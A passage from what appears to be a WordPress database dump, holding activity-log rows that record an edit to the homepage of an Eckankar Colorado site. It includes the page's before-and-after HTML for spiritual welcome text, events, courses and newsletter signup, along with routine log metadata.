class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236929,40271,'_user_email','nada@zipnadanot.org'),(236926,40271,'_message_key','post_updated'),(236927,40271,'_user_id','2'),(236928,40271,'_user_login','S8zhaBda'),(236925,40271,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -135px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236915,40270,'_message_key','post_updated'),(236916,40270,'_user_id','2'),(236917,40270,'_user_login','S8zhaBda'),(236918,40270,'_user_email','nada@zipnadanot.org'),(236919,40270,'_server_remote_addr','76.130.120.x'),(236920,40270,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236921,40271,'post_id','7160'),(236922,40271,'post_type','page'),(236923,40271,'post_title','Home'),(236924,40271,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual 